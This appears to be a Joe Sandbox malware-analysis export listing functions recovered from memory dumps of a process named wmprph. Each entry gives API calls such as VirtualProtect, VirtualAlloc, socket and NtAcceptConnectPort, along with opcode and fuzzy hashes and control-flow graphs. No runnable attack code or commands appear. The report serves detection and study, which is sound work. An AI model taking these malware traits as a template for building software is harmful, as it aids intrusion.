                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2983003510.0000017161851000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017161851000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_17161851000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                  • Opcode ID: 41294f9132f532288ebac11fc5ffb7e2a185503835a2c4f2160672799294d73b
                                                                                                                                                  • Instruction ID: 1b34f91f5d2f8c789f5a23fedf0ea0fd6239a9bfb37b083e0b1dfd4e0b2a8ff7
                                                                                                                                                  • Opcode Fuzzy Hash: 41294f9132f532288ebac11fc5ffb7e2a185503835a2c4f2160672799294d73b
                                                                                                                                                  • Instruction Fuzzy Hash: 3E22683061CA980EE76CDB2C98866F977E8F785701F24066EE0DFC2193DA74D546CB82
                                                                                                                                                  Function 0000017161862EC8 Relevance: 1.8, APIs: 1, Instructions: 260nativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2983003510.0000017161851000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017161851000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_17161851000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AcceptConnectPort
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1658770261-0
                                                                                                                                                  • Opcode ID: 477f8dc71d31783f34f9248ca41e69be52e3134fae9b2781e769503cf8821e2c
                                                                                                                                                  • Instruction ID: b0a470cefc2bc903c0187df35ab1f6fae9eebade68f03c068d04189e5e95fa63
                                                                                                                                                  • Opcode Fuzzy Hash: 477f8dc71d31783f34f9248ca41e69be52e3134fae9b2781e769503cf8821e2c
                                                                                                                                                  • Instruction Fuzzy Hash: BE81A33021CA69ABF775DA1C94467AAB3F9FB94B00F504A19F84EC7280DBA5DC0496C3
                                                                                                                                                  Function 0000017161862CAC Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2983003510.0000017161851000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017161851000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_17161851000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AcceptConnectPort
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1658770261-0
                                                                                                                                                  • Opcode ID: 3e504d11f5da52f1af1682200719c15ad2bad24be6b07785b1bf4d7c48f26462
                                                                                                                                                  • Instruction ID: efd95d685e84f65dee5cefdf514ed998f1ee35a77493420a5230579baa8b0a27
                                                                                                                                                  • Opcode Fuzzy Hash: 3e504d11f5da52f1af1682200719c15ad2bad24be6b07785b1bf4d7c48f26462
                                                                                                                                                  • Instruction Fuzzy Hash: DAF0DA74A1CB948FDB64EF2CD489B9977E1FBA9700F50455DE84CC3245EB3498408B87
                                                                                                                                                  Function 0000017161862E84 Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2983003510.0000017161851000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017161851000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_17161851000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AcceptConnectPort
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1658770261-0
                                                                                                                                                  • Opcode ID: a3b54702dbe03003ef4b69b8382696d02528a9294142f6c5061081efdfa68d71
                                                                                                                                                  • Instruction ID: b120b3454cf6ea0f0adac3db711b41a0d4e8e297851e43c91c591cc0c89421b0
                                                                                                                                                  • Opcode Fuzzy Hash: a3b54702dbe03003ef4b69b8382696d02528a9294142f6c5061081efdfa68d71
                                                                                                                                                  • Instruction Fuzzy Hash: A5E092712086048FDB00EFA8CCC19A9B7F5EBE9305F400D7AE84ACA164D2B4D688C683
                                                                                                                                                  Function 0000017161862D80 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2983003510.0000017161851000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017161851000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_17161851000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AcceptConnectPort
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1658770261-0
                                                                                                                                                  • Opcode ID: 89f4a05ad4cf7a5c42d1f7300e09080cac91406142c330baf98efa371945559f
                                                                                                                                                  • Instruction ID: 5f21ad952d01f922a6ab832bc42d372450cec1886d0b05d7e44e43a9a5ece53d
                                                                                                                                                  • Opcode Fuzzy Hash: 89f4a05ad4cf7a5c42d1f7300e09080cac91406142c330baf98efa371945559f
                                                                                                                                                  • Instruction Fuzzy Hash: 7BD05E34A28A8D8FDA50A72C890160537E2F7E6704F914A58B84CC3204E62DD44093C7
                                                                                                                                                  Function 0000017161862DAC Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2983003510.0000017161851000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017161851000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_17161851000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AcceptConnectPort
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1658770261-0
                                                                                                                                                  • Opcode ID: f3aebb9c130a7595b6eefcdad82ea6d301f140e42f53323116d57528b48ef3ee
                                                                                                                                                  • Instruction ID: cc5b9961f729d00e773b4efa0bb3936cfa44bfeefc4ff1d350e9806e390b0857
                                                                                                                                                  • Opcode Fuzzy Hash: f3aebb9c130a7595b6eefcdad82ea6d301f140e42f53323116d57528b48ef3ee
                                                                                                                                                  • Instruction Fuzzy Hash: 95D01734A18B499BDB10AB28994160A7BE2FBEA718F544F5CF88883310E67DD48087C7
                                                                                                                                                  Function 0000017161862A20 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2983003510.0000017161851000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017161851000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_17161851000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AcceptConnectPort
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1658770261-0
                                                                                                                                                  • Opcode ID: 62332437ee16da287e3653c526f206484f17471112b3976b2a00ba68a8ac2207
                                                                                                                                                  • Instruction ID: ae2f2223035c895b7619cb4f7736b0f56515db6c3a8f3b284c26a8693d75b7a2
                                                                                                                                                  • Opcode Fuzzy Hash: 62332437ee16da287e3653c526f206484f17471112b3976b2a00ba68a8ac2207
                                                                                                                                                  • Instruction Fuzzy Hash: F3D01234A187458BD610AB2884416097BE2F7DA714F548A58F84883321E27DD44186C7
                                                                                                                                                  Function 0000017161862DDC Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,?,0000017161855367), ref: 0000017161862DEC
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2983003510.0000017161851000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017161851000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_17161851000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AcceptConnectPort
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1658770261-0
                                                                                                                                                  • Opcode ID: 09515c4071d5cd1d26304305e5d382a5795874c756b6f30558b0c1d7e16e0e91
                                                                                                                                                  • Instruction ID: c5fbc550fc14d6fe823b40976c50bc092a072020559684625b7fad6ad3d34afd
                                                                                                                                                  • Opcode Fuzzy Hash: 09515c4071d5cd1d26304305e5d382a5795874c756b6f30558b0c1d7e16e0e91
                                                                                                                                                  • Instruction Fuzzy Hash: 48C08C2061C83F6BE914627E4C8275430A4A35E784F800440B408C2184F84CC48063DB
                                                                                                                                                  Function 000001716186290C Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2983003510.0000017161851000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017161851000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_17161851000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AcceptConnectPort
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1658770261-0
                                                                                                                                                  • Opcode ID: ea9358fbe28cd15c97578867be2afda9ae4f1a6df4f19420141c692e89a91aba
                                                                                                                                                  • Instruction ID: 6f1212c07e59660d8fbc7cbd4a20fd82a7c27ac50914c6ec7a010b368970596e
                                                                                                                                                  • Opcode Fuzzy Hash: ea9358fbe28cd15c97578867be2afda9ae4f1a6df4f19420141c692e89a91aba
                                                                                                                                                  • Instruction Fuzzy Hash: 5DC08C24A2E82A6AEA0666BE8C83B9470A8A38E780F800440A408C2180EC4DC48063D3
                                                                                                                                                  Function 00007DF483A01438 Relevance: 6.1, APIs: 4, Instructions: 134registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000003.2800458716.00007DF483A01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF483A01000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_3_7df483a01000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseInformationOpenQueryValueVolume
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4069062851-0
                                                                                                                                                  • Opcode ID: 3ebb744f0aebbecadcf06631c3d65907a1788fb7df7ced3004579ef494ef68f9
                                                                                                                                                  • Instruction ID: 8da7d941503e7b86c2cb34dedd3c7af5f5129e6310a9449f2d43965ba615e5e5
                                                                                                                                                  • Opcode Fuzzy Hash: 3ebb744f0aebbecadcf06631c3d65907a1788fb7df7ced3004579ef494ef68f9
                                                                                                                                                  • Instruction Fuzzy Hash: 70412F3051CA488BE755EF64C4A9BEBB3F1FB94301F004A2EE58BC6291DF79E5448B42
                                                                                                                                                  Function 00007DF4839B8C38 Relevance: 6.1, APIs: 4, Instructions: 130networkCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2986531897.00007DF4839B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4839B1000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_7df4839b1000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: socket$ErrorModeclosesocket
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2183620661-0
                                                                                                                                                  • Opcode ID: 86a7dbef4beb537d1f960ef4159f5a72687c895cdfeef9c93758c5432ac85e68
                                                                                                                                                  • Instruction ID: fc1a2468bfdba9cb72737efc709e8f2b9f9092827932b9191d63211031acd2ed
                                                                                                                                                  • Opcode Fuzzy Hash: 86a7dbef4beb537d1f960ef4159f5a72687c895cdfeef9c93758c5432ac85e68
                                                                                                                                                  • Instruction Fuzzy Hash: 3E41693061C7488FE758EF28D8585AA77E1FB98301F508A6DE49BC33A1DF789545CB41
                                                                                                                                                  Function 00000171618684C0 Relevance: 6.1, APIs: 4, Instructions: 130networkCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2983003510.0000017161851000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017161851000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_17161851000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: socket$ErrorModegetsockopt
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 552242919-0
                                                                                                                                                  • Opcode ID: f4e6771871a383ecd65cf7c786fccd009df30cb3b3764fe840cb75ff13171734
                                                                                                                                                  • Instruction ID: 3bae4f8fca6f40b1a9a98abe4521d12e12ab49807fe375ec7693f2410424d520
                                                                                                                                                  • Opcode Fuzzy Hash: f4e6771871a383ecd65cf7c786fccd009df30cb3b3764fe840cb75ff13171734
                                                                                                                                                  • Instruction Fuzzy Hash: 1B41A6746187488FE758EF28D85969A77E1FB99300F514A2DF04BC32A1DB38D405DB42
                                                                                                                                                  Function 000001716185E2A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74memoryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2983003510.0000017161851000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017161851000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_17161851000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                  • String ID: rE\
                                                                                                                                                  • API String ID: 544645111-988334199
                                                                                                                                                  • Opcode ID: 75d6d8eb26df1a839d51af674b3d6b425c3a8640e6788e6840d12e792dd5345f
                                                                                                                                                  • Instruction ID: 1b2c2d50dfc1ae9ce9aa52111179f76367d1537850d4dcb56cc3cea8f9128583
                                                                                                                                                  • Opcode Fuzzy Hash: 75d6d8eb26df1a839d51af674b3d6b425c3a8640e6788e6840d12e792dd5345f
                                                                                                                                                  • Instruction Fuzzy Hash: 8A1194313089095BEB85FB6CA892BE972EAF7D8700F401529B50FC328ADE68CD455782
                                                                                                                                                  Function 000001716185BC64 Relevance: 4.6, APIs: 3, Instructions: 110fileCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2983003510.0000017161851000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017161851000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_17161851000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$CloseHandleMappingOpenView
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2553196624-0
                                                                                                                                                  • Opcode ID: e5e44baeb6ac7a5ef2abf0622d7dcda60392d94986a7d3768f6014d184717f4c
                                                                                                                                                  • Instruction ID: 5889950a3ebcbb79b0c626d9c5310680a4b822654b4ddee228f855f67d2ff18a
                                                                                                                                                  • Opcode Fuzzy Hash: e5e44baeb6ac7a5ef2abf0622d7dcda60392d94986a7d3768f6014d184717f4c
                                                                                                                                                  • Instruction Fuzzy Hash: 2B31A631218A4C5FDB95FF24D4866EAB3E9FB94301F508929B44FC3196EA70D5059783
                                                                                                                                                  Function 000001716185BA4C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 147COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2983003510.0000017161851000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017161851000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_17161851000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateWindow
                                                                                                                                                  • String ID: P
                                                                                                                                                  • API String ID: 716092398-3110715001
                                                                                                                                                  • Opcode ID: cfa3f0b6778a70b443997505d324e50d054ac30842702c4c9102a20ff55eb27d
                                                                                                                                                  • Instruction ID: aa58d1318d43904292dc472afbf228a211c598aa851a137f4455004e6be9927d
                                                                                                                                                  • Opcode Fuzzy Hash: cfa3f0b6778a70b443997505d324e50d054ac30842702c4c9102a20ff55eb27d
                                                                                                                                                  • Instruction Fuzzy Hash: EE514170518B848FD7A5EF28D88A79ABBE5FB95711F10462EE08EC2290DF349445CB83
                                                                                                                                                  Function 00007DF4839E47B8 Relevance: 3.3, APIs: 2, Instructions: 339windowCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 304 7df4839e47b8-7df4839e47f0 call 7df4839e1478 307 7df4839e4b0d-7df4839e4b32 call 7df4839e55b0 304->307 308 7df4839e47f6-7df4839e480e call 7df4839e1538 304->308 308->307 313 7df4839e4814-7df4839e4845 call 7df4839e1708 call 7df4839e1740 call 7df4839e1818 308->313 313->307 321 7df4839e484b-7df4839e485d 313->321 321->307 323 7df4839e4863-7df4839e4880 321->323 325 7df4839e4958-7df4839e4a0d call 7df4839edb48 call 7df4839e28d4 call 7df4839edb72 call 7df4839edb6c call 7df4839edb66 SendMessageA 323->325 326 7df4839e4886-7df4839e48f6 call 7df4839edb48 * 3 323->326 368 7df4839e4a12-7df4839e4a18 325->368 345 7df4839e4953-7df4839e4956 326->345 345->325 347 7df4839e48f8-7df4839e48fb 345->347 349 7df4839e48fd-7df4839e4901 347->349 350 7df4839e4909-7df4839e4921 calloc 347->350 349->350 352 7df4839e4903-7df4839e4907 349->352 353 7df4839e4a7e 350->353 354 7df4839e4927-7df4839e4945 call 7df4839e55d0 350->354 352->350 356 7df4839e4950-7df4839e4951 352->356 360 7df4839e4a87-7df4839e4a8a 353->360 361 7df4839e4a5c-7df4839e4a60 354->361 362 7df4839e494b-7df4839e494c 354->362 356->345 363 7df4839e4a8c-7df4839e4a8f 360->363 364 7df4839e4af5-7df4839e4af6 360->364 365 7df4839e4a62-7df4839e4a66 361->365 366 7df4839e4a6b-7df4839e4a6f 361->366 367 7df4839e494e 362->367 369 7df4839e4a91-7df4839e4ab4 call 7df4839edb48 363->369 370 7df4839e4ade 363->370 373 7df4839e4afe-7df4839e4b08 call 7df4839e2730 364->373 365->367 366->367 371 7df4839e4a75-7df4839e4a79 366->371 367->356 368->373 374 7df4839e4a1e-7df4839e4a24 368->374 384 7df4839e4abe-7df4839e4ad6 call 7df4839edb48 369->384 385 7df4839e4ab6-7df4839e4abc 369->385 372 7df4839e4ae0-7df4839e4af3 370->372 371->367 372->360 372->364 373->307 374->373 377 7df4839e4a2a-7df4839e4a3e 374->377 377->373 383 7df4839e4a44-7df4839e4a57 call 7df4839e55d0 377->383 383->372 384->370 385->370
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2986967644.00007DF4839E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4839E1000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_7df4839e1000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FunctionMessageProtectSendTableVirtualcalloc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2453823186-0
                                                                                                                                                  • Opcode ID: f21b9ec484d8d2d9b9243406eb49c24197b694a35871426f8b048c7a46f2aacc
                                                                                                                                                  • Instruction ID: 78a6c5da8eb928631d1498df4abd972a8abdbba90c6b9a38765b8cc1913157cf
                                                                                                                                                  • Opcode Fuzzy Hash: f21b9ec484d8d2d9b9243406eb49c24197b694a35871426f8b048c7a46f2aacc
                                                                                                                                                  • Instruction Fuzzy Hash: D2B12331A1CA888FEB55EF64D4955BB73F1FF94310F504A2AD04BC3292EEB8E9458781
                                                                                                                                                  Function 00007DF4839B4290 Relevance: 3.2, APIs: 2, Instructions: 244windowCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2986531897.00007DF4839B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4839B1000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_7df4839b1000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FunctionMessageProtectSendTableVirtualcalloc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2453823186-0
                                                                                                                                                  • Opcode ID: 9476529166d77aa32403f16abccb553efbe971cbc2abc63400368bf18a283a5f
                                                                                                                                                  • Instruction ID: a5359ffbb3bacb814dd15ea115d6ca3a137a9fca669cd6e7b3d638c303a3c9e6
                                                                                                                                                  • Opcode Fuzzy Hash: 9476529166d77aa32403f16abccb553efbe971cbc2abc63400368bf18a283a5f
                                                                                                                                                  • Instruction Fuzzy Hash: CF71523061CA988FDB54EF18D8A15BB73E2FF54700F50466AE44BC7296DE38E9518BC1
                                                                                                                                                  Function 00000171618522D4 Relevance: 3.2, APIs: 2, Instructions: 222memoryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 515 171618522d4-17161852303 GetSystemInfo 516 17161852305-17161852310 515->516 517 17161852313-17161852329 515->517 516->517 518 1716185232f-17161852332 517->518 519 17161852334-17161852337 518->519 520 1716185234e-17161852354 518->520 523 17161852349-1716185234c 519->523 524 17161852339-1716185233c 519->524 521 17161852356-17161852366 520->521 522 171618523cf-171618523d2 520->522 525 17161852395-1716185239b 521->525 526 1716185245e 522->526 523->518 524->523 527 1716185233e-17161852343 524->527 528 17161852368-1716185237f 525->528 529 1716185239d 525->529 530 17161852460-17161852463 526->530 531 1716185246b-17161852482 526->531 527->523 532 171618524b1-171618524c3 527->532 528->529 543 17161852381-17161852389 528->543 533 1716185239f-171618523a2 529->533 534 171618523d7-171618523f5 530->534 535 17161852469 530->535 536 17161852484-1716185249e 531->536 533->522 538 171618523a4-171618523c4 VirtualAlloc 533->538 540 17161852437 534->540 541 171618523f7-1716185240e 534->541 535->532 536->536 539 171618524a0-171618524ab 536->539 538->531 544 171618523ca-171618523cd 538->544 539->532 542 17161852439-1716185243c 540->542 541->540 548 17161852410-17161852418 541->548 542->532 546 1716185243e-1716185245c 542->546 543->533 547 1716185238b-17161852393 543->547 544->521 544->522 546->526 547->525 547->529 548->542 549 1716185241a-17161852435 548->549 549->540 549->541
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2983003510.0000017161851000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017161851000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_17161851000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocInfoSystemVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3440192736-0
                                                                                                                                                  • Opcode ID: 97221a5a18e4aacc6e4870847a1657838270caee770a845de3dac3f068ae24cc
                                                                                                                                                  • Instruction ID: 7d58c1d771a461467495175860aa220474dbd519e90599ab7c6780ef4905f0f5
                                                                                                                                                  • Opcode Fuzzy Hash: 97221a5a18e4aacc6e4870847a1657838270caee770a845de3dac3f068ae24cc
                                                                                                                                                  • Instruction Fuzzy Hash: A251D63021CE0D8FFB95EB7C94893A976F6F798701F540129E44DC31A9EEB8D8859782
                                                                                                                                                  Function 000001716185D7C0 Relevance: 3.2, APIs: 2, Instructions: 155fileCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2983003510.0000017161851000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017161851000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_17161851000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseFileHandleView
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3964672402-0
                                                                                                                                                  • Opcode ID: 2545b146e03987401e8860446111752460087adb5538b97f3e49e3c2a2eae485
                                                                                                                                                  • Instruction ID: 8b9500eb704c3848740ba9e1e8f01e95ea75083094c702f2ee09a1e3bd8e4aa5
                                                                                                                                                  • Opcode Fuzzy Hash: 2545b146e03987401e8860446111752460087adb5538b97f3e49e3c2a2eae485
                                                                                                                                                  • Instruction Fuzzy Hash: D74154312189089FEB85FF6CD886BE673F9EB95701F100659B80EC2196DF74D941DB82
                                                                                                                                                  Function 0000017161852978 Relevance: 3.1, APIs: 2, Instructions: 97memoryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2983003510.0000017161851000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017161851000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_17161851000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                                  • Opcode ID: 71851ab31bd5e99a8088f9e241981b9a75f35149f95cf9a9c2613fb5189a6f34
                                                                                                                                                  • Instruction ID: 7f49b609a3108d0b8e4221bb25ca4b592fdd8a9a450ffc2e45311c375b139769
                                                                                                                                                  • Opcode Fuzzy Hash: 71851ab31bd5e99a8088f9e241981b9a75f35149f95cf9a9c2613fb5189a6f34
                                                                                                                                                  • Instruction Fuzzy Hash: 0D313A3130CA848FEB559B3CD8997953BE6FB9A310F150295F89DC72D9CB98C802C386
                                                                                                                                                  Function 00007DF483A012C8 Relevance: 3.1, APIs: 2, Instructions: 90memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2987398812.00007DF483A01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF483A01000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_7df483a01000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                                  • Opcode ID: aa55061d99e775b82e27cc6da46f8fa59da2ee6fc95db4891e67f0932caa2168
                                                                                                                                                  • Instruction ID: a81b2743ff87145cbe1aab595796cf8f03f30f1210e3d2c5c38926fa6d9b5566
                                                                                                                                                  • Opcode Fuzzy Hash: aa55061d99e775b82e27cc6da46f8fa59da2ee6fc95db4891e67f0932caa2168
                                                                                                                                                  • Instruction Fuzzy Hash: 8C21E539608645C7EB5CAB3CD4B46B6B3F1FF94300F14493AE84BC7B85D668F8818256
                                                                                                                                                  Function 00007DF483A012C8 Relevance: 3.1, APIs: 2, Instructions: 90memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000003.2800458716.00007DF483A01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF483A01000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_3_7df483a01000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                                  • Opcode ID: 89563af4fe1d572c43706a2c5b782feb3df9d02bfd1ff06021ce1d81ad062eb6
